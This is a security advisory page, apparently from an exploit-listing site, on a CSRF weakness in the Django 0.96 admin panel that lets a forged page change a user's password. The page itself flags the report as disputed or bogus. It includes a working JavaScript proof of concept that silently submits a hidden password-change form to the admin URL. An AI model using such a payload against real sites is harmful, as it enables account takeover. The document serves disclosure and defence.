WARNING! Fake news / Disputed / BOGUS

Django 0.96 (stable) Admin Panel CSRF

2007.11.05
Credit: J. Carlos Nieto
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-5828
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author: J. Carlos Nieto. Date: Oct 21, 2007 There exists a security hole in the default django's admin panel. Background ========== Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design. Django has an automatic admin panel that allows a person with admin privileges to modify the database tables, it allows to change any user password too. See more at http://www.djangoproject.com Summary ======= django has, by default, no CSRF protection, this may allow an attacker to change any user password by tricking a victim with admin privileges into a special forged web page (even in a a totally different server) that sends a request to change the password of the user with id = n. The victim does not know that the form was sent. If the victim has admin privileges the exploit will succeed, otherwise nothing will happen. Severity ======== Mild. This problem exists only with the default installation and can be easily solved using a middleware found in here: http://www.djangoproject.com/documentation/csrf/. Proof of concept ================ <script type="text/javascript"> window.onload = function() { var url = "http://127.0.0.1:8000/admin/auth/user/1/password/"; var pass = "funky"; var param = { password1: pass, password2: pass }; var form = document.createElement('form'); form.action = url; form.method = 'post'; form.target = 'hidden'; form.style.display = 'none'; for (var i in param) { try { // ie var input = document.createElement('<input name="'+i+'">'); } catch(e) { // other browsers var input = document.createElement('input'); input.name = i; } input.setAttribute('value', param[i]); form.appendChild(input); } document.body.appendChild(form); form.submit(); } </script> <iframe name="hidden" style="display: none"></iframe> Solution ======== Use the django's CSRF protection in all your applications. Take a look at http://www.djangoproject.com/documentation/csrf/. Disclosure Timeline =================== 2007.10.18 - Vulnerability found 2007.10.18 - Vulnerability reported to vendor 2007.10.18 - Vendor response 2007.10.21 - Advisory release License ======= Copyright 2007 J. Carlos Nieto The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top